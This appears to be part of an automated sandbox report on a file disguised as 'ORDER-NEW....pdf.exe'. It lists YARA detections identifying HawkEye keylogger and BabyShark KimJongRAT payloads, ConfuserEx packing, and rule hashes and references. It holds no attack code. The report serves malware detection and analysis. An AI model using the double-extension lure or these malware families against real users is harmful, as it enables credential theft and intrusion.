Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe; Code function: 8_2_0040F078 OpenClipboard,GetLastError,DeleteFileW,8_2_0040F078

System Summary

              Source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 18.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.23.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 18.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.7f31990.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480000.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4a73c3c.8.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.94d834a.4.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 5.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480000.3.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.3.AppLaunch.exe.875dbda.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.2.AppLaunch.exe.7f31990.2.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.24.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 18.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.2.AppLaunch.exe.7e95950.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.4afe15c.7.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5b7b560.11.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.21.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.9480345.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.5b7b560.11.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.20.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.5af10f4.10.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.2.AppLaunch.exe.94d834a.4.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.7.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705890.0.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.3.AppLaunch.exe.875dbda.2.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 18.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 5.0.AppLaunch.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705bd5.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.0.ORDER-NEW....pdf.exe.49e970c.8.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 5.3.AppLaunch.exe.8705890.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 0.2.ORDER-NEW....pdf.exe.49e970c.6.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEye v9 Payload, Author: ditekshen
              Source: 00000005.00000000.689728198.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000005.00000002.930832405.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000012.00000000.843177172.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000005.00000000.690486770.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000012.00000000.842827239.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000005.00000002.933674801.0000000009480000.00000004.00020000.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000000.00000000.703620754.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000012.00000000.842483097.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000005.00000000.690115034.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000005.00000002.932528508.0000000006EA1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000000.00000002.733884470.00000000047C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000000.00000000.702281950.00000000047C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000012.00000000.843631196.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000005.00000000.691070548.0000000000402000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Detects BabyShark KimJongRAT, Author: Florian Roth
              Source: 00000000.00000000.712572110.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000000.00000002.738563781.0000000005AF1000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: 00000000.00000000.711229338.00000000047C0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: Process Memory Space: ORDER-NEW....pdf.exe PID: 6860, type: MEMORYSTR; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: Process Memory Space: AppLaunch.exe PID: 7160, type: MEMORYSTR; Matched rule: Detects HawkEye Keylogger Reborn, Author: Florian Roth
              Source: initial sample; Static PE information: Filename: ORDER-NEW....pdf.exe
              Source: ORDER-NEW....pdf.exe; Static PE information: section name: (empty)
              Source: ORDER-NEW....pdf.exe; Static PE information: section name: )xrUhX
              Source: ORDER-NEW....pdf.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
              Source: 18.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4a73c3c.19.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.5af10f4.12.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 5.0.AppLaunch.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 18.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 18.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 18.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1, date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
              Source: 5.0.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE; Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18, date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE; Matched rule: SUSP_NET_NAME_ConfuserEx, author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
              Source: 0.0.ORDER-NEW....pdf.exe.4afe15c.9.raw.unpack, type: UNPACKEDPE; Matched rule: HawkEyev9, author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
